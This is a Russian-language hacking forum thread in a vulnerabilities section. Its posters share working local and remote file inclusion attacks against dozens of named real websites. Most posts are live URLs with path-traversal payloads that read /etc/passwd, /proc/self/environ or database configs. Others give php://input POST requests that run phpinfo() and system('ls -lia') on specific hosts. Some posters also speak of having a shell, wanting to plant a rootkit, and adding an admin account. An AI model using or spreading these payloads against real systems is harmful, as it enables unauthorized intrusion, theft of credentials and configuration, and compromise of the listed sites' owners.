PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.quantum-electron.ru/pa.phtml?page=../../../../../../../../../../etc/passwd%00
     
    _________________________
  2. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    Code:
    http://www.alushta.ua/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
     
    2 people like this.
  3. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Ну, собственно, и мои пять копеек:)

     
  4. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Code:
    http://polyakovprud.dp.ua/index.php?page=/../../../../../../../../../proc/self/environ
    Code:
    http://mir-audio.com.ua/admin/file_manager.php/login.php?action=download&filename=includes/configure.php
    для последнего: https://forum.antichat.ru/showthread.php?t=71111 можно админа добавить и тупо под ним зайти :)
     
    2 people like this.
  5. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    php://input

    выполнение произвольного php - кода, редко вижу.
    итак, выполняем следующие пост-запросы:

    Code:
    POST /index.php?link=php://input HTTP/1.1
    Host: www.alternativeautosource.net
    Content-Length: 19
    
    <?php phpinfo(); ?>
    Code:
    POST /lang_de/main.php?view=php://input HTTP/1.1
    Host: www.galvania.ca
    Content-Length: 19
    
    <?php phpinfo(); ?>
    Code:
    POST /page_en.php?link=php://input HTTP/1.1
    Host: www.rochelle.cz
    Content-Length: 19
    
    <?php phpinfo(); ?>
    и видим PHPINFO серверов :)
    Code:
    POST /WWW/main.php?CONTENT=php://input HTTP/1.1
    Host: polyplast-mainz.de
    Content-Length: 27
    
    <?php system("ls -lia"); ?>
    а тут листинг директории))
     
    2 people like this.
  6. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    HTML:
    http://www.sexycamnow.com/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
    HTML:
    http://grindhouze.com/cms/index.php/recent/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
    HTML:
    http://www.semiprice.fr/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
     
    1 person likes this.
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.tierheim-spanien.de/thspa.php?inc=../../../../../../../../../../etc/passwd%00
     
    _________________________
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    RFI

    http://www.axode.com/en/products.php?module_catalogue_page=[/color][/B]
     
    _________________________
    1 person likes this.
  9. Chi

    Chi New Member

    Joined:
    30 Aug 2010
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    Один из крупнейших порталов по теме образования в Латвии :
    Code:
    http://shkola.lv/index.php?mode=goods&page=../../../../../etc/passwd%00
     
    1 person likes this.
  10. Keltos

    Keltos Banned

    Joined:
    8 Jul 2009
    Messages:
    1,558
    Likes Received:
    920
    Reputations:
    520
    Code:
    http://www.hyaffiliates.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image
    Code:
    http://pheromore.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image
    Code:
    http://www.4xwins.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image
    Code:
    http://www.blastarticles.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image
    Code:
    http://www.attractingabundance.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image
    Code:
    http://www.parentcoachplan.com/affiliate/scripts/showPop.php?special=1&banner_content=file:///etc/passwd&impression_content=image&clickurl=image
     
    4 people like this.
  11. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    http://www.wirtualnailawa.pl/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
     
    1 person likes this.
  12. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://www.virtualiroma.it/index.php?open=/web/htdocs/www.virtualiroma.it/home/index.php

    http://www.giardinodiroma.eu/index.php?open=../../../../../../../etc/issue
     
    #1192 547, 12 Sep 2010
    Last edited: 12 Sep 2010
  13. valyka80

    valyka80 Banned

    Joined:
    14 Jun 2010
    Messages:
    163
    Likes Received:
    20
    Reputations:
    16
    http://www.smacworld.com/new/index.php?p=../../../../../../../../../../proc/self/environ
    Кому интересно там есть шелл,
    но немогу rootkit поставить нет еще сплоитов
     
    1 person likes this.
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://wierzba.wzks.uj.edu.pl/~dymet/zarty/index.php?go=/etc/passwd%00

    http://www.fav.co.il/index.php?dir=app_sites&page=../../../../../../../etc/hosts%00
     
    2 people like this.
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.equinix.com/download.php?file=../../../../../../../../../../../../../etc/passwd
    http://www.hrcpa.com/press/index.php?file=../../../../../../../../../../etc/passwd (--> исходники)
     
    _________________________
    3 people like this.
  16. valyka80

    valyka80 Banned

    Joined:
    14 Jun 2010
    Messages:
    163
    Likes Received:
    20
    Reputations:
    16
    http://www.e-ntech.com/index.php?page=../../../../../../../../../../etc/passwd
    http://www.hiro-seiko.com/index.php?page=../../../../../../../../../../etc/passwd
    http://www.mitorosso.com/index.php?p=../../../../../../../../../../etc/passwd
    http://www.maxparts.ru/index.php?page=../../../../../../../../../../etc/passwd
    http://athomebirmingham.com/index.php?p=../../../../../../../../../../etc/passwd
    http://www.myspacegraphicshelper.com/index.php?page=../../../../../../../../../../etc/passwd
    http://www.opticaldocumentsecurity.com/index.php?page=../../../../../../../../../../etc/passwd
    http://www.amarc.org/index.php?p=../../../../../../../../../../etc/passwd
    http://www.madrid21comunidad.fida.es/index.php?pagina=../../../../../../../../../../proc/self/environ
    удачи :D
     
    3 people like this.
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.radioexpress.com/public/content.php?loc=../../../../../../etc/my.cnf
     
    _________________________
  18. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    PR - 1

    Code:
    http://www.4kidsinpa.com/index.php?option=com_jesubmit&view=../../../../../../../../../etc/passwd%00
    Code:
    http://www.andycon.net/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd
    PR - 2

    Code:
    http://westcoastghosthunters.com/index.php?option=com_jesubmit&view=&view=../../../../../../../../../../../../../etc/passwd%00
    Code:
    http://westcoastghosthunters.com/index.php?option=com_jesubmit&view=&view=../../../../../../../../../../../../../etc/passwd%00

    PR - 4

    Code:
    http://www.kommunisten.de/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
    PR - 5

    Code:
    http://www.armnn.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
    Code:
    http://www.teabagfree.com/index.php/events/day.listevents/2009/11/19/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00

    PR - 3

    Code:
    http://www.svkronenberg.nl/beugelen/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
    PR - 1

    Code:
    http://borchardtbrothers.com/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
    Code:
    http://www.svkronenberg.nl/beugelen/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
    Code:
    http://www.oranjportal.com/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
    Code:
    http://www.aliveinchrist.org/index.php/templates/templates/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
     
    _________________________
    #1198 <Cyber-punk>, 20 Sep 2010
    Last edited: 20 Sep 2010
    1 person likes this.
  19. valyka80

    valyka80 Banned

    Joined:
    14 Jun 2010
    Messages:
    163
    Likes Received:
    20
    Reputations:
    16
    http://www.rhianna.ro/index.php?page=../../../../../../../../../../proc/self/environ
    http://www.vapnet.com.br/index.php?pagina=../../../../../../../../../../proc/self/status
    http://www.mutokukai.ru/iframe.php?target=../../../../../../../../../../etc/passwd
     
    #1199 valyka80, 21 Sep 2010
    Last edited by a moderator: 21 Sep 2010
    1 person likes this.
  20. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    http://www.wirtualnailawa.pl/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
    http://www.popular-articles.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
    http://www.kucha-statey.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
    http://www.articles-top.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
    http://www.articlesgallery.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
    http://www.top-statey.ru/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
    http://monsterspray.biz/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
    http://www.asictonline.org/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
     
    _________________________